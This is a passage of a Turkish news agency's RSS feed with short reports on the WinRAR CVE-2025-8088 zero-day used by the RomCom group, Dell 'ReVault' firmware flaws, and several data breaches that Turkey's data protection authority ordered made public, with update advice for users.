<p data-start="1732" data-end="2013"><strong data-start="1732" data-end="1765">Yaşlılar neden hedef alınıyor</strong><br data-start="1765" data-end="1768">Rapora göre yaşlı yetişkinler, daha büyük finansal birikimlere sahip olmaları, otoritelere duydukları güven ve teknolojiyi daha az bilme sebebiyle hedef oluyor. Birçok kişinin hayat birikimlerini ve emeklilik hesaplarını kaybettiği bildirildi.</p>
<p data-start="2015" data-end="2225"><strong data-start="2015" data-end="2063">Genel dolandırıcılık kaybı 12,5 milyar dolar</strong><br data-start="2063" data-end="2066">FTC, 2024 yılında Amerikalıların toplam dolandırıcılık kaybının 12,5 milyar dolara ulaştığını ve bunun 2023’e göre yüzde 25 artış anlamına geldiğini duyurdu.</p>
<p data-start="2227" data-end="2437"><strong data-start="2227" data-end="2239"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>WinRAR’da sıfır gün açığı: RomCom grubu sahte e-postalarla zararlı yazılım yükledi</title>
            <link>https://cumha.com.tr/winrarda-sifir-gun-acigi-romcom-grubu-sahte-e-postalarla-zararli-yazilim-yukledi</link>
            <guid>https://cumha.com.tr/winrarda-sifir-gun-acigi-romcom-grubu-sahte-e-postalarla-zararli-yazilim-yukledi</guid>
            <description><![CDATA[ CVE-2025-8088 olarak takip edilen ve WinRAR 7.13 sürümüyle giderilen güvenlik açığı, saldırganların özel hazırlanmış arşivlerle dosyaları kullanıcı seçimi dışında dizinlere çıkarmasına imkân tanıyor. Açığın sıfır gün olarak kullanıldığı saldırılarda RomCom grubu, kimlik avı e-postalarıyla dağıttığı RAR dosyaları üzerinden sistemlere arka kapı yerleştirdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a46ef5304be.webp" length="50514" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:38 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>WinRAR CVE-2025-8088 açığı nasıl çalışıyor, RomCom grubu bu açığı hangi yöntemle kullandı, saldırılardan kimler etkilendi, kullanıcılar kendilerini nasıl koruyabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="500" data-end="788"><strong data-start="500" data-end="536">Dizin geçişi açığı tespit edildi</strong><br data-start="536" data-end="539">ESET araştırmacıları Anton Cherepanov, Peter Košinár ve Peter Strýček tarafından keşfedilen CVE-2025-8088 açığı, WinRAR’ın önceki sürümlerinde dosya çıkartma sırasında saldırgan tarafından belirlenen bir yola yönlendirme yapılmasına imkân veriyor.</p>
<p data-start="790" data-end="1038"><strong data-start="790" data-end="839">Windows başlangıç klasörüne kötü amaçlı dosya</strong><br data-start="839" data-end="842">Bu yöntemle saldırganlar, zararlı yürütülebilir dosyaları Windows Başlangıç klasörlerine yerleştirebiliyor. Kullanıcı oturum açtığında dosya otomatik çalışıyor ve uzaktan kod yürütme sağlanıyor.</p>
<p data-start="1040" data-end="1272"><strong data-start="1040" data-end="1079">Phishing kampanyalarında kullanıldı</strong><br data-start="1079" data-end="1082">ESET, RomCom grubunun hedefli kimlik avı e-postaları aracılığıyla gönderilen RAR eklerinde bu açığı kullandığını belirledi. Bu saldırılarla kurban sistemlere RomCom arka kapıları yüklendi.</p>
<p data-start="1274" data-end="1587"><strong data-start="1274" data-end="1307">RomCom’un geçmiş faaliyetleri</strong><br data-start="1307" data-end="1310">Rusya bağlantılı RomCom grubu (Storm-0978, Tropical Scorpius veya UNC2596 olarak da biliniyor), daha önce Cuba ve Industrial Spy fidye yazılımlarıyla ilişkilendirilmişti. Grup, kimlik bilgisi hırsızlığı ve veri gaspı odaklı saldırılarda sıfır gün açıklarını sıkça kullanıyor.</p>
<p data-start="1589" data-end="1784"><strong data-start="1589" data-end="1625">Kullanıcılara güncelleme uyarısı</strong><br data-start="1625" data-end="1628">Uzmanlar, WinRAR’ın otomatik güncelleme özelliği bulunmadığı için tüm kullanıcıların 7.13 sürümünü manuel olarak indirip yüklemesi gerektiğini vurguluyor.</p>
<p data-start="1786" data-end="1970"><strong data-start="1786" data-end="1798"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Dell dizüstülerde “ReVault” açığı: Windows oturum açma bypass edilerek kalıcı zararlı yazılım yüklenebiliyor</title>
            <link>https://cumha.com.tr/dell-dizustulerde-revault-acigi-windows-oturum-acma-bypass-edilerek-kalici-zararli-yazilim-yuklenebiliyor</link>
            <guid>https://cumha.com.tr/dell-dizustulerde-revault-acigi-windows-oturum-acma-bypass-edilerek-kalici-zararli-yazilim-yuklenebiliyor</guid>
            <description><![CDATA[ Cisco Talos araştırmacıları, Dell’in Latitude ve Precision serisi dahil 100’den fazla modelinde kullanılan ControlVault3 güvenlik yongasında kritik açıklar tespit etti. “ReVault” adı verilen beş zafiyet, saldırganlara Windows oturum açmayı atlama, yönetici ayrıcalığı elde etme ve işletim sistemi yeniden kurulduktan sonra dahi varlığını sürdüren kötü amaçlı yazılım yerleştirme imkânı veriyor. Dell, Mart-Mayıs 2025 döneminde güvenlik güncellemeleri yayımladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4701a1eb76.webp" length="55358" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:37 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>ReVault açıkları hangi Dell modellerini etkiliyor, saldırganlar Windows oturumunu nasıl bypass edebiliyor, hangi güvenlik önlemleri alınmalı, Dell bu zafiyetlere karşı ne zaman güncelleme yayımladı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="630" data-end="982"><strong data-start="630" data-end="666">Beş güvenlik açığı tespit edildi</strong><br data-start="666" data-end="669">Cisco’nun Talos güvenlik ekibi, Dell’in ControlVault3 firmware ve Windows API’lerinde beş kritik açık keşfetti. CVE-2025-24311, CVE-2025-25050, CVE-2025-25215, CVE-2025-24922 ve CVE-2025-24919 kodlarıyla tanımlanan açıklar bellek taşmalarından güvensiz serileştirmeye kadar farklı güvenlik kusurlarını içeriyor.</p>
<p data-start="984" data-end="1292"><strong data-start="984" data-end="1015">Oturum açma atlatılabiliyor</strong><br data-start="1015" data-end="1018">Araştırmaya göre saldırganlar bu açıkları zincirleyerek firmware üzerinde keyfi kod çalıştırabiliyor. Bu sayede Windows oturum açma işlemini atlatmak, kullanıcı ayrıcalıklarını yönetici seviyesine çıkarmak ve kalıcı kötü amaçlı yazılımlar yerleştirmek mümkün hale geliyor.</p>
<p data-start="1294" data-end="1585"><strong data-start="1294" data-end="1319">Fiziksel erişim riski</strong><br data-start="1319" data-end="1322">Cisco Talos, fiziksel erişimi bulunan bir saldırganın cihazı açarak USB üzerinden Unified Security Hub (USH) kartına bağlanabileceğini, böylece parmak izi doğrulamasını manipüle ederek cihazın herhangi bir parmak izini kabul etmesini sağlayabileceğini bildirdi.</p>
<p data-start="1587" data-end="1784"><strong data-start="1587" data-end="1616">Dell güncelleme yayımladı</strong><br data-start="1616" data-end="1619">Dell, Mart-Mayıs 2025 arasında ControlVault3 sürücü ve firmware güncellemeleri yayımladı. Şirket, etkilenen modellerin tam listesini güvenlik duyurusunda paylaştı.</p>
<p data-start="1786" data-end="2195"><strong data-start="1786" data-end="1807">Önerilen önlemler</strong><br data-start="1807" data-end="1810">Araştırmacılar, cihazların güncel tutulması, kullanılmayan parmak izi okuyucu, akıllı kart okuyucu ve NFC gibi güvenlik bileşenlerinin devre dışı bırakılması gerektiğini vurguladı. Ayrıca BIOS üzerinden kasa açılma uyarısının etkinleştirilmesi ve Windows’ta Gelişmiş Oturum Açma Güvenliği (ESS) özelliğinin kullanılmasının fiziksel saldırılara karşı ek koruma sağlayacağı belirtildi.</p>
<p data-start="2197" data-end="2413"><strong data-start="2197" data-end="2209"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Richemont İstanbul’da veri ihlali: 25 bin müşterinin kimlik ve iletişim bilgileri ele geçirildi</title>
            <link>https://cumha.com.tr/richemont-istanbulda-veri-ihlali-25-bin-musterinin-kimlik-ve-iletisim-bilgileri-ele-gecirildi</link>
            <guid>https://cumha.com.tr/richemont-istanbulda-veri-ihlali-25-bin-musterinin-kimlik-ve-iletisim-bilgileri-ele-gecirildi</guid>
            <description><![CDATA[ Lüks eşya dağıtım şirketi Richemont İstanbul’da 17-18 Ocak 2025 tarihlerinde yaşanan siber saldırıda, bir çalışanın hesabı ele geçirilerek müşteri verilerine erişim sağlandı. 25 bin 737 kişinin isim, e-posta, ülke bilgisi, müşteri kimliği ve doğum tarihi gibi kişisel verilerinin etkilendiği açıklandı. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a477e21b30c.webp" length="45462" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:36 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Richemont İstanbul veri ihlali nasıl gerçekleşti, olaydan kaç müşteri etkilendi, hangi kişisel veriler sızdırıldı, ihlal ne zaman tespit edildi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="535" data-end="848"><strong data-start="535" data-end="588">Hesap ele geçirilerek müşteri verilerine ulaşıldı</strong><br data-start="588" data-end="591">Richemont İstanbul Lüks Eşya Dağıtım A.Ş., veri ihlaline ilişkin Kişisel Verileri Koruma Kurumu’na bildirimde bulundu. Açıklamaya göre ihlal, Richemont Group bünyesinde görev yapan bir çalışanın hesabının yetkisiz kişilerce ele geçirilmesiyle gerçekleşti.</p>
<p data-start="850" data-end="1005"><strong data-start="850" data-end="885">İhlal dört ay sonra fark edildi</strong><br data-start="885" data-end="888">Saldırının 17-18 Ocak 2025 tarihlerinde gerçekleştiği, ancak 30 Mayıs 2025 tarihinde tespit edilebildiği aktarıldı.</p>
<p data-start="1007" data-end="1231"><strong data-start="1007" data-end="1042">25 bini aşkın müşteri etkilendi</strong><br data-start="1042" data-end="1045">Olaydan 25 bin 737 müşteri ve potansiyel müşterinin etkilendiği bildirildi. Ele geçirilen veriler arasında isim, e-posta adresi, ülke bilgisi, müşteri kimliği ve doğum tarihi yer aldı.</p>
<p data-start="1233" data-end="1472"><strong data-start="1233" data-end="1271">KVKK kamuoyuna duyurma kararı aldı</strong><br data-start="1271" data-end="1274">Kişisel Verileri Koruma Kurulu, 3 Haziran 2025 tarihli ve 2025/1006 sayılı kararıyla veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Konuya ilişkin incelemeler devam ediyor.</p>
<p data-start="1474" data-end="1636"><strong data-start="1474" data-end="1486"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>İstanbul Gedik Üniversitesi’nde veri ihlali: 23 bin kişi etkilendi, 209 bin kayıtta kişisel bilgiler sızdı</title>
            <link>https://cumha.com.tr/istanbul-gedik-universitesinde-veri-ihlali-23-bin-kisi-etkilendi-209-bin-kayitta-kisisel-bilgiler-sizdi</link>
            <guid>https://cumha.com.tr/istanbul-gedik-universitesinde-veri-ihlali-23-bin-kisi-etkilendi-209-bin-kayitta-kisisel-bilgiler-sizdi</guid>
            <description><![CDATA[ 13-14 Mayıs 2025 tarihlerinde İstanbul Gedik Üniversitesi adına veri işleyen şirketin sistemlerine yetkisiz erişim sağlandı. 23 bin 269 kişinin etkilendiği olayda ad, soyad, e-posta, kurum bilgileri ve trafik verileri gibi bilgilerin bulunduğu 209 bin 421 kayıt risk altına girdi. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a47026c41f1.webp" length="45396" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:35 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>İstanbul Gedik Üniversitesi veri ihlali ne zaman gerçekleşti, olaydan kaç kişi etkilendi, hangi kişisel veriler sızdırıldı, KVKK hangi kararı aldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="524" data-end="840"><strong data-start="524" data-end="557">Yetkisiz erişim iki gün sürdü</strong><br data-start="557" data-end="560">İstanbul Gedik Üniversitesi, yaşanan veri ihlaline ilişkin Kişisel Verileri Koruma Kurumu’na bildirimde bulundu. Açıklamaya göre, 13-14 Mayıs 2025 tarihleri arasında üniversite adına veri işleyen şirketin sistemlerine yetkisiz erişim sağlandı ve durum 14 Mayıs’ta tespit edildi.</p>
<p data-start="842" data-end="1065"><strong data-start="842" data-end="882">23 bin kişi, 209 bin kayıt etkilendi</strong><br data-start="882" data-end="885">Veri ihlalinden çalışanlar, kullanıcılar ve öğrencilerin yer aldığı 23 bin 269 kişinin etkilendiği, toplamda 209 bin 421 kayıtta kişisel verilerin risk altında olduğu belirtildi.</p>
<p data-start="1067" data-end="1330"><strong data-start="1067" data-end="1095">Hangi veriler sızdırıldı</strong><br data-start="1095" data-end="1098">İhlalden etkilenen veriler arasında ad, soyad, kullanıcı adı, maskelenmiş T.C. kimlik numarası (yalnızca son dört hanesi görünür şekilde), e-posta adresi, kurum-departman bilgileri ve kullanıcı trafik verileri bulunduğu aktarıldı.</p>
<p data-start="1332" data-end="1551"><strong data-start="1332" data-end="1370">KVKK kararıyla kamuoyuna duyuruldu</strong><br data-start="1370" data-end="1373">Kişisel Verileri Koruma Kurulu, 3 Haziran 2025 tarihli ve 2025/997 sayılı kararıyla veri ihlalinin kamuoyuna duyurulmasına karar verdi. Konuyla ilgili incelemeler devam ediyor.</p>
<p data-start="1553" data-end="1718"><strong data-start="1553" data-end="1565"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Louis Vuitton Türkiye’de veri ihlali: 142 bin müşterinin kimlik ve iletişim bilgileri sızdırıldı</title>
            <link>https://cumha.com.tr/louis-vuitton-turkiyede-veri-ihlali-142-bin-musterinin-kimlik-ve-iletisim-bilgileri-sizdirildi</link>
            <guid>https://cumha.com.tr/louis-vuitton-turkiyede-veri-ihlali-142-bin-musterinin-kimlik-ve-iletisim-bilgileri-sizdirildi</guid>
            <description><![CDATA[ 7 Haziran 2025’te başlayan ve 2 Temmuz’da tespit edilen veri ihlalinde Louis Vuitton’un müşteri veritabanına yetkisiz erişim sağlandığı açıklandı. Türkiye’de 142 bin 995 kişinin kimlik ve iletişim bilgilerinin etkilendiği bildirildi. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4703423f3e.webp" length="63540" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:34 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Louis Vuitton veri ihlali nasıl gerçekleşti, olaydan kaç kişi etkilendi, hangi kişisel veriler sızdırıldı, ihlal ne zaman tespit edildi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="467" data-end="818"><strong data-start="467" data-end="521">Yetkisiz erişim üçüncü taraf üzerinden gerçekleşti</strong><br data-start="521" data-end="524">Louis Vuitton Çantacılık Ticaret A.Ş., müşterilere ait veritabanına yönelik yetkisiz erişim hakkında Kişisel Verileri Koruma Kurumu’na bildirimde bulundu. Açıklamaya göre, ihlal üçüncü taraf bir hizmet sağlayıcının yöneticisi tarafından kullanılan servis hesabının ele geçirilmesiyle başladı.</p>
<p data-start="820" data-end="1022"><strong data-start="820" data-end="842">İhlal bir ay sürdü</strong><br data-start="842" data-end="845">7 Haziran 2025’te başlayan saldırı, 2 Temmuz 2025’te tespit edildi. Yetkisiz erişim süresince müşterilere ait kimlik ve iletişim bilgilerinin risk altına girdiği ifade edildi.</p>
<p data-start="1024" data-end="1246"><strong data-start="1024" data-end="1050">142 bin kişi etkilendi</strong><br data-start="1050" data-end="1053">Türkiye’de 142 bin 995 müşteri ve potansiyel müşterinin verilerinin etkilendiği bildirildi. İncelemeler sürerken, etkilenen veri kategorilerinin kimlik ve iletişim bilgileri olduğu aktarıldı.</p>
<p data-start="1248" data-end="1443"><strong data-start="1248" data-end="1284">KVKK’dan kamuoyuna duyuru kararı</strong><br data-start="1284" data-end="1287">Kişisel Verileri Koruma Kurulu, 10 Temmuz 2025 tarihli ve 2025/1246 sayılı kararıyla veri ihlalinin kurumun internet sitesinde yayımlanmasına karar verdi.</p>
<p data-start="1445" data-end="1599"><strong data-start="1445" data-end="1457"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>BeiGene veri ihlali: Klinik çalışmalara ait dosyalar internete sızdı, Türkiye’den 467 kişi etkilendi</title>
            <link>https://cumha.com.tr/beigene-veri-ihlali-klinik-calismalara-ait-dosyalar-internete-sizdi-turkiyeden-467-kisi-etkilendi</link>
            <guid>https://cumha.com.tr/beigene-veri-ihlali-klinik-calismalara-ait-dosyalar-internete-sizdi-turkiyeden-467-kisi-etkilendi</guid>
            <description><![CDATA[ 16 Haziran 2025’te BeiGene, Ltd. bünyesinde sınırlı sayıda kurumsal dosyanın internet ortamına yüklendiği belirlendi. Klinik çalışmalarla ilgili belgelerin sızması sonucu Türkiye’den 17 çalışan ve 450 hastanın kimlik, iletişim ve sağlık bilgilerinin etkilendiği açıklandı. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a470aca3e9a.webp" length="45658" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:14 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>BeiGene veri ihlalinde hangi dosyalar sızdırıldı, olaydan kaç kişi etkilendi, hangi kişisel veriler risk altında, ihlal ne zaman tespit edildi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="510" data-end="744"><strong data-start="510" data-end="561">Dosyalar yasa dışı paylaşım sitelerine yüklendi</strong><br data-start="561" data-end="564">BeiGene, Ltd. tarafından yapılan bildirimde, 16 Haziran 2025 tarihinde sınırlı sayıda kurumsal dosyanın pastebin.com ve swisstransfer.com platformlarına yüklendiği tespit edildi.</p>
<p data-start="746" data-end="925"><strong data-start="746" data-end="791">Klinik çalışmalara ait veriler sızdırıldı</strong><br data-start="791" data-end="794">Sızdırılan belgelerin, şirketin yürüttüğü klinik çalışmaların planlanması ve takibi için kullanılan verileri içerdiği belirtildi.</p>
<p data-start="927" data-end="1153"><strong data-start="927" data-end="949">467 kişi etkilendi</strong><br data-start="949" data-end="952">Veri ihlalinden Türkiye’de 17 çalışan ve 450 hasta olmak üzere toplam 467 kişinin etkilendiği bildirildi. Etkilenen kişisel veri kategorilerinin kimlik, iletişim ve sağlık bilgileri olduğu aktarıldı.</p>
<p data-start="1155" data-end="1413"><strong data-start="1155" data-end="1193">KVKK kamuoyuna duyurma kararı aldı</strong><br data-start="1193" data-end="1196">Kişisel Verileri Koruma Kurulu, 24 Haziran 2025 tarihli ve 2025/1130 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Olayla ilgili incelemelerin sürdüğü belirtildi.</p>
<p data-start="1415" data-end="1576"><strong data-start="1415" data-end="1427"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Bold LLC veri ihlali: 3 bini aşkın kullanıcının özgeçmiş bilgileri yetkisiz erişime açıldı</title>
            <link>https://cumha.com.tr/bold-llc-veri-ihlali-3-bini-askin-kullanicinin-oezgecmis-bilgileri-yetkisiz-erisime-acildi</link>
            <guid>https://cumha.com.tr/bold-llc-veri-ihlali-3-bini-askin-kullanicinin-oezgecmis-bilgileri-yetkisiz-erisime-acildi</guid>
            <description><![CDATA[ Porto Riko merkezli çevrimiçi iş arama platformu Bold LLC’de, kullanıcıların özgeçmişlerini düzenlerken kullanılan ön izleme özelliğinde güvenlik açığı tespit edildi. 12 Temmuz 2025’te fark edilen olayda, 3168 kullanıcının anonimleştirilmiş özgeçmiş verilerine yetkisiz erişim sağlandığı belirlendi. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a47821cf4ab.webp" length="65604" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:13 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Bold LLC veri ihlalinde hangi kişisel veriler açığa çıktı, güvenlik açığı ne zaman fark edildi, kaç kullanıcı etkilendi, yetkisiz erişim kaç kez gerçekleşti</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="527" data-end="877"><strong data-start="527" data-end="571">Güvenlik açığı 2023’ten bu yana mevcuttu</strong><br data-start="571" data-end="574">Bold LLC tarafından yapılan açıklamaya göre, kullanıcıların özgeçmişlerini düzenlerken gerçek zamanlı ön izleme imkânı sunan yeni bir özelliğin yetkisiz erişime açık olduğu 12 Temmuz 2025’te tespit edildi. İncelemeler, söz konusu açığın ilk olarak 10 Mart 2023 tarihinde ortaya çıktığını ortaya koydu.</p>
<p data-start="879" data-end="1147"><strong data-start="879" data-end="918">Bir kez yetkisiz erişim gerçekleşti</strong><br data-start="918" data-end="921">Şirketin bildiriminde, sunucu ortamının daha hızlı performans için anonimleştirilmiş verileri önbelleğe almak üzere erişilebilir hale getirildiği, bu durum nedeniyle yalnızca bir kez yetkisiz erişimin yaşandığı ifade edildi.</p>
<p data-start="1149" data-end="1573"><strong data-start="1149" data-end="1198">Anonimleştirilmiş özgeçmiş verileri etkilendi</strong><br data-start="1198" data-end="1201">İhlalden etkilenen veriler arasında isim, iletişim bilgileri ve özgeçmiş içerikleri yer aldı. Verilerin kapsamı kullanıcı tercihine bağlı olarak değişiklik gösterirken, bazı özgeçmişlerde sadece ad ve soyad bilgileri bulunduğu, bazılarında ise eğitim, istihdam geçmişi, iletişim bilgileri, fotoğraflar ve gönüllü olarak paylaşılan diğer bilgilerin yer aldığı bildirildi.</p>
<p data-start="1575" data-end="1759"><strong data-start="1575" data-end="1611">3 bini aşkın kullanıcı etkilendi</strong><br data-start="1611" data-end="1614">Bold LLC, ihlalden etkilenen ilgili kişi gruplarının kullanıcılar ve aboneler olduğunu, toplam 3168 kişinin verilerinin etkilendiğini açıkladı.</p>
<p data-start="1761" data-end="1992"><strong data-start="1761" data-end="1788">KVKK duyuru kararı aldı</strong><br data-start="1788" data-end="1791">Kişisel Verileri Koruma Kurulu, 24 Temmuz 2025 tarihli ve 2025/1356 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. İncelemelerin sürdüğü aktarıldı.</p>
<p data-start="1994" data-end="2169"><strong data-start="1994" data-end="2006"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Yatırım Finansman’a fidye yazılımı saldırısı: Etkilenen kişi sayısı ve veri grupları araştırılıyor</title>
            <link>https://cumha.com.tr/yatirim-finansmana-fidye-yazilimi-saldirisi-etkilenen-kisi-sayisi-ve-veri-gruplari-arastiriliyor</link>
            <guid>https://cumha.com.tr/yatirim-finansmana-fidye-yazilimi-saldirisi-etkilenen-kisi-sayisi-ve-veri-gruplari-arastiriliyor</guid>
            <description><![CDATA[ 20 Temmuz 2025’te Yatırım Finansman Menkul Değerler A.Ş. sunucu ve bilgisayarlarına uluslararası bir grup tarafından fidye yazılımı saldırısı düzenlendi. Kişisel verilerin hangi gruplara ait olduğu ve etkilenen kişi sayısı henüz tespit edilemedi. Kişisel Verileri Koruma Kurulu, ihlalin kamuoyuna duyurulmasına karar verdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4710f98df2.webp" length="49594" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:12 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Yatırım Finansman’a yönelik fidye yazılımı saldırısı ne zaman gerçekleşti, saldırıyı kimler düzenledi, kaç kişinin kişisel verisi etkilenmiş olabilir, vatandaşlar bilgi almak için hangi kanalları kullanabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="482" data-end="705"><strong data-start="482" data-end="516">Saldırı aynı gün tespit edildi</strong><br data-start="516" data-end="519">Yatırım Finansman Menkul Değerler A.Ş., 20 Temmuz 2025’te yaşanan fidye yazılımı saldırısını Kişisel Verileri Koruma Kurumu’na bildirdi. Açıklamaya göre saldırı aynı gün tespit edildi.</p>
<p data-start="707" data-end="894"><strong data-start="707" data-end="752">Uluslararası bir saldırı grubu hedef aldı</strong><br data-start="752" data-end="755">Şirketin bildiriminde, sunucular ve istemci bilgisayarların uluslararası ve uzman bir saldırı grubu tarafından hedef alındığı belirtildi.</p>
<p data-start="896" data-end="1126"><strong data-start="896" data-end="945">Kişisel veriler üzerindeki etki araştırılıyor</strong><br data-start="945" data-end="948">Saldırının ardından etkilenen kişi sayısı, ilgili kişi grupları ve kişisel veri kategorilerinin henüz belirlenemediği ifade edildi. Teknik incelemelerin devam ettiği aktarıldı.</p>
<p data-start="1128" data-end="1332"><strong data-start="1128" data-end="1166">Vatandaşlar için başvuru kanalları</strong><br data-start="1166" data-end="1169">Şirket, saldırıyla ilgili bilgi almak isteyen kişilerin tüm şubelerden ve 0 850 723 59 59 numaralı Yatırımcı Destek Hattı üzerinden destek alabileceğini duyurdu.</p>
<p data-start="1334" data-end="1513"><strong data-start="1334" data-end="1360">KVKK’dan duyuru kararı</strong><br data-start="1360" data-end="1363">Kişisel Verileri Koruma Kurulu, 24 Temmuz 2025 tarihli ve 2025/1359 sayılı kararıyla ihlalin Kurumun internet sitesinde ilan edilmesine karar verdi.</p>
<p data-start="1515" data-end="1742"><strong data-start="1515" data-end="1527"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Biletal veri ihlali: 7 bin 800 müşterinin bilgileri yasadışı platformlarda satışa çıkarıldı</title>
            <link>https://cumha.com.tr/biletal-veri-ihlali-7-bin-800-musterinin-bilgileri-yasadisi-platformlarda-satisa-cikarildi</link>
            <guid>https://cumha.com.tr/biletal-veri-ihlali-7-bin-800-musterinin-bilgileri-yasadisi-platformlarda-satisa-cikarildi</guid>
            <description><![CDATA[ Bilet satış platformu Biletal’a ait müşteri verilerinin siber saldırganlar tarafından yasa dışı internet ortamında satışa sunulduğu belirlendi. 11 Ağustos 2025’te tespit edilen olayda yaklaşık 7 bin 800 kişinin kimlik, iletişim ve müşteri işlem verilerinin etkilendiği açıklandı. KVKK, ihlalin kamuoyuyla paylaşılmasına karar verdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4712be342c.webp" length="61766" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:08:11 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Biletal veri ihlalinde kaç müşteri etkilendi, hangi kişisel veriler satışa çıkarıldı, ihlal ne zaman tespit edildi, KVKK hangi kararı aldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="484" data-end="709"><strong data-start="484" data-end="527">Yasadışı platformlarda satışa çıkarıldı</strong><br data-start="527" data-end="530">Biletal İç ve Dış Ticaret A.Ş., siber saldırı sonucu kişisel verilerin yasa dışı internet platformlarında satışa çıkarıldığını Kişisel Verileri Koruma Kurumu’na (KVKK) bildirdi.</p>
<p data-start="711" data-end="943"><strong data-start="711" data-end="748">İhlal 11 Ağustos’ta tespit edildi</strong><br data-start="748" data-end="751">Açıklamaya göre, Bilgi Teknolojileri ve İletişim Kurumu’ndan (BTK) gelen yazının ardından şirket bilişim ekiplerinin yaptığı inceleme sonucunda ihlal 11 Ağustos 2025 tarihinde tespit edildi.</p>
<p data-start="945" data-end="1214"><strong data-start="945" data-end="976">7 bin 800 müşteri etkilendi</strong><br data-start="976" data-end="979">Veri ihlalinden yaklaşık 7 bin 800 kişinin etkilendiği belirtilirken, ihlale konu olan kişisel veriler arasında kimlik, iletişim ve müşteri işlem bilgileri bulunduğu ifade edildi. Etkilenen grubun sadece müşteriler olduğu bildirildi.</p>
<p data-start="1216" data-end="1437"><strong data-start="1216" data-end="1252">KVKK’dan kamuoyuna duyuru kararı</strong><br data-start="1252" data-end="1255">Kişisel Verileri Koruma Kurulu, 14 Ağustos 2025 tarihli ve 2025/1481 sayılı kararıyla ihlalin Kurum internet sitesinde ilan edilmesine karar verdi. Konuya ilişkin inceleme sürüyor.</p>
<p data-start="1439" data-end="1596"><strong data-start="1439" data-end="1451"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
